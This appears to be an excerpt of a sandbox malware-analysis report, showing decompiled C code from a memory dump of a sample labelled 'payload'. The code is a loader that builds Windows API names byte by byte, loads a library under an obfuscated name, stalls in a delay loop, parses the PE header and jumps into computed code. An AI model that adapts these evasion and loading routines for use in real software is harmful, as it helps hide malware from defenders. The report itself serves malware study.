							goto L17;
						} else {
							 *0x305061 = 0x6b;
							 *0x00305062 = 0x65;
							 *0x00305063 = 0x72;
							 *0x00305064 = 0x6e;
							 *0x00305065 = 0x65;
							 *0x00305066 = 0x6c;
							 *0x00305067 = 0x33;
							_t21 = LoadLibraryA("kernel32.dll");
							 *0x40500e = _t21;
							_t45 = "pejpCreate";
							 *_t45 = 0x70616548;
							 *((short*)(_t45 + 4)) = 0x7243;
							 *((short*)(_t45 + 6)) = 0x6165;
							_push(_t45);
							_push(_t21);
							_push(__imp__LoadLibraryExW);
							_pop( *0x40500a);
							_push(_t21);
							_push(1);
							 *_t57 =  *_t57 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf"); // executed
							_t22 = E00401CAE(_t21); // executed
							if(_t22 != 0) {
								goto L16;
							}
							L"oidsapi.dll" = 0x6e;
							M00405038 = 0x74;
							_t25 = LoadLibraryExW( &((L"")[1]), 0, 0);
							 *((intOrPtr*)(_t55 - 4)) = _t25;
							_push(_t25);
							if(_t25 == 0) {
								goto L16;
							}
							_push("zzdjjqpqaxlgt"); // executed
							_t26 = E00402E18(_t25); // executed
							_push("true");
							 *_t57 =  *_t57 - 1;
							_push(0x4050b3);
							_push("bkktdsxxkjueaz"); // executed
							_t27 = E00402BB3(_t26); // executed
							if(_t27 != 0) {
								goto L16;
							}
							_push(0x1e);
							do {
								_t29 = WaitForSingleObject(0xffffffff, 1); // executed
								 *_t57 =  *_t57 - 1;
							} while ( *_t57 != 0);
							_t57 = _t57 + 4;
							 *0x40501a = 0;
							_push("zzdjjqpqaxlgt"); // executed
							E00402E18(_t29); // executed
							_pop(_t49);
							 *_t57 =  *_t57 +  *((intOrPtr*)(_t49 + 0x3c));
							_t53 = _t49;
							 *0x405002 = _t53 + 0xa4;
							_t31 =  *0x405002;
							_t32 =  *_t31;
							 *0x405002 = _t32;
							_t66 =  *0x405002 - 0xfff;
							if(_t66 > 0) {
								goto L16;
							}
							asm("sbb dword [ecx], 0xa0");
							if(_t66 < 0) {
								goto L16;
							}
							 *0x405016 = GetProcAddress();
							LoadLibraryA("kernel32.dll");
							 *0x40501a = E004019C6;
							_push(E00402749);
							_pop(_t37);
							 *0x40501a =  *0x40501a + _t37;
							if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
								 *0x40501a =  *0x40501a - E00402749;
								_t38 =  *0x40501a; // 0x0
								goto __eax;
							}
							 *0x40501a =  *0x40501a ^ E004019C6;
							goto __eax;
						}
					}
					_push( *0x4050cf);
					_t43 = E00402AD0(_t15);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t43) != 0) {
						goto L1;
					}
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(_t15 != 0) {
						goto L1;
					}
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(_t15 != 0) {
						goto L1;
					}
					_push(E004016FF);
					return E004016FF;
				} else {
					_push(1);
					 *_t57 =  *_t57 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					if(E00401CAE(_t38) != 0) {
						goto L18;
					} else {
						_push(0xf);
						 *_t57 =  *_t57 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz");
						if(_t15 != 0) {
							goto L18;
						} else {
							_push( *0x4050cf);
							_t39 = E00402AD0(_t15);
							_push( *0x4050cf);
							E00402AD0(_t39);
							_push(0x401e1e);
							return 0x401e1e;
						}
					}
				}
			}

























    0x004020f6
    0x004020fb
    0x00402100
    0x00402105
    0x00402107
    0x0040210a
    0x0040210f
    0x0040211c
    0x00402c4b
    0x00402c4b
    0x00402c50
    0x00402c55
    0x00402c57
    0x00402c5a
    0x00402c5f
    0x00402c6c
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x00402c72
    0x00402c78
    0x00402c7d
    0x00402c7f
    0x00402c82
    0x00402c87
    0x00402c94
    0x00000000
    0x00000000
    0x00402c9a
    0x00402c9c
    0x00402c9f
    0x00402ca4
    0x00402cb1
    0x00000000
    0x00000000
    0x00402cb7
    0x00402cb9
    0x00402cbc
    0x00402cc1
    0x00402cce
    0x00000000
    0x00000000
    0x00402cda
    0x00402cdb
    0x00402122
    0x00402122
    0x00402124
    0x00402127
    0x0040212c
    0x00402138
    0x00000000
    0x0040213e
    0x0040213e
    0x00402140
    0x00402143
    0x00402148
    0x00402155
    0x00000000
    0x0040215b
    0x0040215b
    0x00402161
    0x00402166
    0x0040216c
    0x00402177
    0x00402178
    0x00402178
    0x00402155
    0x00402138

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401130, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 165synchronization
    C-Code - Quality: 48%
    			E00401130() {
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				struct HINSTANCE__* _t18;
				intOrPtr _t19;
				struct HINSTANCE__* _t22;
				void* _t23;
				intOrPtr _t24;
				long _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t34;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t42;
				intOrPtr* _t44;
				void* _t48;
				void* _t52;
				void* _t54;
				intOrPtr* _t56;

				_push(1);
				 *_t56 =  *_t56 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L5:
					_push(1);
					 *_t56 =  *_t56 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					_t13 = E00401CAE(_t12);
					__eflags = _t13;
					if(_t13 != 0) {
						L8:
						_push(1);
						 *_t56 =  *_t56 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t14 = E00401CAE(_t13); // executed
						__eflags = _t14;
						if(_t14 != 0) {
							L20:
							L21:
							goto L21;
						}
						__eflags = _t54 - 0xfd00;
						if(_t54 < 0xfd00) {
							goto L20;
						}
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t18 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t18;
						_t44 = "pejpCreate";
						 *_t44 = 0x70616548;
						 *((short*)(_t44 + 4)) = 0x7243;
						 *((short*)(_t44 + 6)) = 0x6165;
						_push(_t44);
						_push(_t18);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t18);
						_push(1);
						 *_t56 =  *_t56 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						__eflags = _t19;
						if(_t19 != 0) {
							goto L20;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t54 - 4)) = _t22;
						_push(_t22);
						__eflags = _t22;
						if(_t22 == 0) {
							goto L20;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t23 = E00402E18(_t22); // executed
						_push("true");
						 *_t56 =  *_t56 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t24 = E00402BB3(_t23); // executed
						__eflags = _t24;
						if(_t24 != 0) {
							goto L20;
						}
						_push(0x1e);
						do {
							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t56 =  *_t56 - 1;
							__eflags =  *_t56;
						} while ( *_t56 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t26); // executed
						_pop(_t48);
						 *((intOrPtr*)(_t56 + 4)) =  *((intOrPtr*)(_t56 + 4)) +  *((intOrPtr*)(_t48 + 0x3c));
						_t52 = _t48;
						 *0x405002 = _t52 + 0xa4;
						_t28 =  *0x405002;
						_t29 =  *_t28;
						 *0x405002 = _t29;
						__eflags =  *0x405002 - 0xfff;
						if(__eflags > 0) {
							goto L20;
						}
						asm("sbb dword [ecx], 0xa0");
						if(__eflags < 0) {
							goto L20;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t34);
						 *0x40501a =  *0x40501a + _t34;
						__eflags =  *((intOrPtr*)(_t54 - 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t54 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
					_push(0xf);
					 *_t56 =  *_t56 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t13 = E00402BB3(_t13);
					__eflags = _t13;
					if(_t13 != 0) {
						goto L8;
					}
					_push("zzdjjqpqaxlgt");
					_t37 = E00402E18(_t13);
					_push("zzdjjqpqaxlgt");
					_t38 = E00402E18(_t37);
					_push( *0x4050cf);
					_t39 = E00402AD0(_t38);
					_push( *0x4050cf);
					E00402AD0(_t39);
					_push(E0040299E);
					return E0040299E;
				} else {
					_push("zzdjjqpqaxlgt");
					_t42 = E00402E18(_t12);
					_push(0xf);
					 *_t56 =  *_t56 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t42) != 0) {
						goto L5;
					} else {
						_push(1);
						 *_t56 =  *_t56 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf");
						if(_t12 != 0) {
							goto L5;
						} else {
							_push(1);
							 *_t56 =  *_t56 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf");
							if(_t12 != 0) {
								goto L5;
							} else {
								_push(0x401e1e);
								return 0x401e1e;
							}
						}
					}
				}
			}
























    0x00401130
    0x00401132
    0x00401135
    0x0040113a
    0x00401146
    0x0040168a
    0x0040168a
    0x0040168c
    0x0040168f
    0x00401694
    0x00401699
    0x0040169e
    0x004016a0
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004016a6
    0x004016a8
    0x004016ab
    0x004016b0
    0x004016b5
    0x004016ba
    0x004016bc
    0x00000000
    0x00000000
    0x004016c2
    0x004016c7
    0x004016cc
    0x004016d1
    0x004016d6
    0x004016dc
    0x004016e1
    0x004016e7
    0x004016f2
    0x004016f3
    0x0040114c
    0x0040114c
    0x00401151
    0x00401156
    0x00401158
    0x0040115b
    0x00401160
    0x0040116c
    0x00000000
    0x00401172
    0x00401172
    0x00401174
    0x00401177
    0x0040117c
    0x00401188
    0x00000000
    0x0040118e
    0x0040118e
    0x00401190
    0x00401193
    0x00401198
    0x004011a5
    0x00000000
    0x004011ab
    0x004011b1
    0x004011b2
    0x004011b2
    0x004011a5
    0x00401188
    0x0040116c

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004026E8, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 164synchronization
    C-Code - Quality: 45%
    			E004026E8() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				struct HINSTANCE__* _t22;
				void* _t23;
				struct HINSTANCE__* _t26;
				void* _t27;
				void* _t28;
				long _t30;
				intOrPtr* _t32;
				intOrPtr _t33;
				void* _t38;
				signed int _t39;
				void* _t43;
				void* _t44;
				intOrPtr* _t46;
				void* _t50;
				void* _t54;
				void* _t56;
				intOrPtr* _t58;
				void* _t68;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push( *0x4050cf);
				_t13 = E00402AD0(_t12);
				_push("zzdjjqpqaxlgt");
				_t14 = E00402E18(_t13);
				_push("zzdjjqpqaxlgt");
				_t15 = E00402E18(_t14);
				_push(0xf);
				 *_t58 =  *_t58 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t15) != 0) {
					_push("zzdjjqpqaxlgt");
					_t17 = E00402E18(_t16);
					_push(1);
					 *_t58 =  *_t58 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					if(E00401CAE(_t17) != 0) {
						L1:
						_push(1);
						 *_t58 =  *_t58 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t16); // executed
						if(_t18 != 0 || _t56 < 0xfd00) {
							L14:
							L15:
							goto L15;
						} else {
							 *0x305061 = 0x6b;
							 *0x00305062 = 0x65;
							 *0x00305063 = 0x72;
							 *0x00305064 = 0x6e;
							 *0x00305065 = 0x65;
							 *0x00305066 = 0x6c;
							 *0x00305067 = 0x33;
							_t22 = LoadLibraryA("kernel32.dll");
							 *0x40500e = _t22;
							_t46 = "pejpCreate";
							 *_t46 = 0x70616548;
							 *((short*)(_t46 + 4)) = 0x7243;
							 *((short*)(_t46 + 6)) = 0x6165;
							_push(_t46);
							_push(_t22);
							_push(__imp__LoadLibraryExW);
							_pop( *0x40500a);
							_push(_t22);
							_push(1);
							 *_t58 =  *_t58 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf"); // executed
							_t23 = E00401CAE(_t22); // executed
							if(_t23 != 0) {
								goto L14;
							}
							L"oidsapi.dll" = 0x6e;
							M00405038 = 0x74;
							_t26 = LoadLibraryExW( &((L"")[1]), 0, 0);
							 *((intOrPtr*)(_t56 - 4)) = _t26;
							_push(_t26);
							if(_t26 == 0) {
								goto L14;
							}
							_push("zzdjjqpqaxlgt"); // executed
							_t27 = E00402E18(_t26); // executed
							_push("true");
							 *_t58 =  *_t58 - 1;
							_push(0x4050b3);
							_push("bkktdsxxkjueaz"); // executed
							_t28 = E00402BB3(_t27); // executed
							if(_t28 != 0) {
								goto L14;
							}
							_push(0x1e);
							do {
								_t30 = WaitForSingleObject(0xffffffff, 1); // executed
								 *_t58 =  *_t58 - 1;
							} while ( *_t58 != 0);
							 *0x40501a = 0;
							_push("zzdjjqpqaxlgt"); // executed
							E00402E18(_t30); // executed
							_pop(_t50);
							 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) +  *((intOrPtr*)(_t50 + 0x3c));
							_t54 = _t50;
							 *0x405002 = _t54 + 0xa4;
							_t32 =  *0x405002;
							_t33 =  *_t32;
							 *0x405002 = _t33;
							_t68 =  *0x405002 - 0xfff;
							if(_t68 > 0) {
								goto L14;
							}
							asm("sbb dword [ecx], 0xa0");
							if(_t68 < 0) {
								goto L14;
							}
							 *0x405016 = GetProcAddress();
							LoadLibraryA("kernel32.dll");
							 *0x40501a = E004019C6;
							_push(E00402749);
							_pop(_t38);
							 *0x40501a =  *0x40501a + _t38;
							if( *((intOrPtr*)(_t56 - 4)) != 0xffffffff) {
								 *0x40501a =  *0x40501a - E00402749;
								_t39 =  *0x40501a; // 0x0
								goto __eax;
							}
							 *0x40501a =  *0x40501a ^ E004019C6;
							goto __eax;
						}
					}
					_push(0xf);
					 *_t58 =  *_t58 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(_t16 != 0) {
						goto L1;
					}
					_push( *0x4050cf);
					_t43 = E00402AD0(_t16);
					_push(0xf);
					 *_t58 =  *_t58 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t43) != 0) {
						goto L1;
					}
					_push( *0x4050cf);
					_t44 = E00402AD0(_t16);
					_push(0xf);
					 *_t58 =  *_t58 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t44) != 0) {
						goto L1;
					}
					_push(E00402868);
					return E00402868;
				} else {
					_push( *0x4050cf);
					E00402AD0(_t39);
					_push(0x401e1e);
					return 0x401e1e;
				}
			}




























    0x004026e8
    0x004026ed
    0x004026f2
    0x004026f8
    0x004026fd
    0x00402702
    0x00402707
    0x0040270c
    0x00402711
    0x00402713
    0x00402716
    0x0040271b
    0x00402727
    0x00402a29
    0x00402a2e
    0x00402a33
    0x00402a35
    0x00402a38
    0x00402a3d
    0x00402a4a
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x00402a50
    0x00402a52
    0x00402a55
    0x00402a5a
    0x00402a66
    0x00000000
    0x00000000
    0x00402a6c
    0x00402a72
    0x00402a77
    0x00402a79
    0x00402a7c
    0x00402a81
    0x00402a8e
    0x00000000
    0x00000000
    0x00402a94
    0x00402a9a
    0x00402a9f
    0x00402aa1
    0x00402aa4
    0x00402aa9
    0x00402ab6
    0x00000000
    0x00000000
    0x00402ac2
    0x00402ac3
    0x0040272d
    0x0040272d
    0x00402733
    0x0040273e
    0x0040273f
    0x0040273f

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401557, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 155synchronization
    C-Code - Quality: 50%
    			E00401557() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t22;
				intOrPtr _t23;
				struct HINSTANCE__* _t26;
				void* _t27;
				intOrPtr _t28;
				long _t30;
				intOrPtr* _t32;
				intOrPtr _t33;
				void* _t38;
				void* _t40;
				intOrPtr* _t45;
				void* _t49;
				void* _t53;
				void* _t55;
				intOrPtr* _t57;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push("zzdjjqpqaxlgt");
				_t13 = E00402E18(_t12);
				_push( *0x4050cf);
				_t14 = E00402AD0(_t13);
				_push(0xf);
				 *_t57 =  *_t57 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t14) != 0) {
					L15:
					_push( *0x4050cf);
					_t16 = E00402AD0(_t15);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t17 = E00402BB3(_t16);
					__eflags = _t17;
					if(_t17 != 0) {
						L3:
						_push(1);
						 *_t57 =  *_t57 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t17); // executed
						__eflags = _t18;
						if(_t18 != 0) {
							L18:
							L19:
							goto L19;
						}
						__eflags = _t55 - 0xfd00;
						if(_t55 < 0xfd00) {
							goto L18;
						}
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t22 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t22;
						_t45 = "pejpCreate";
						 *_t45 = 0x70616548;
						 *((short*)(_t45 + 4)) = 0x7243;
						 *((short*)(_t45 + 6)) = 0x6165;
						_push(_t45);
						_push(_t22);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t22);
						_push(1);
						 *_t57 =  *_t57 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t23 = E00401CAE(_t22); // executed
						__eflags = _t23;
						if(_t23 != 0) {
							goto L18;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t26 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t55 - 4)) = _t26;
						_push(_t26);
						__eflags = _t26;
						if(_t26 == 0) {
							goto L18;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t27 = E00402E18(_t26); // executed
						_push("true");
						 *_t57 =  *_t57 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t28 = E00402BB3(_t27); // executed
						__eflags = _t28;
						if(_t28 != 0) {
							goto L18;
						}
						_push(0x1e);
						do {
							_t30 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t57 =  *_t57 - 1;
							__eflags =  *_t57;
						} while ( *_t57 != 0);
						_t57 = _t57 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t30); // executed
						_pop(_t49);
						 *_t57 =  *_t57 +  *((intOrPtr*)(_t49 + 0x3c));
						_t53 = _t49;
						 *0x405002 = _t53 + 0xa4;
						_t32 =  *0x405002;
						_t33 =  *_t32;
						 *0x405002 = _t33;
						__eflags =  *0x405002 - 0xfff;
						if(__eflags > 0) {
							goto L18;
						}
						asm("sbb dword [ecx], 0xa0");
						if(__eflags < 0) {
							goto L18;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t38);
						 *0x40501a =  *0x40501a + _t38;
						__eflags =  *((intOrPtr*)(_t55 - 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t15 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
					_push( *0x4050cf);
					_t40 = E00402AD0(_t17);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t17 = E00402BB3(_t40);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L3;
					}
					_push("zzdjjqpqaxlgt");
					E00402E18(_t17);
					_push(E00401CB5);
					return E00401CB5;
				} else {
					_push(1);
					 *_t57 =  *_t57 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					if(_t15 != 0) {
						goto L15;
					} else {
						_push("zzdjjqpqaxlgt");
						E00402E18(_t15);
						_push(0x401e1e);
						return 0x401e1e;
					}
				}
			}

























    0x00401557
    0x0040155c
    0x00401561
    0x00401566
    0x0040156b
    0x00401571
    0x00401576
    0x00401578
    0x0040157b
    0x00401580
    0x0040158c
    0x00402687
    0x00402687
    0x0040268d
    0x00402692
    0x00402694
    0x00402697
    0x0040269c
    0x004026a1
    0x004026a6
    0x004026a8
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004026ae
    0x004026b4
    0x004026b9
    0x004026bb
    0x004026be
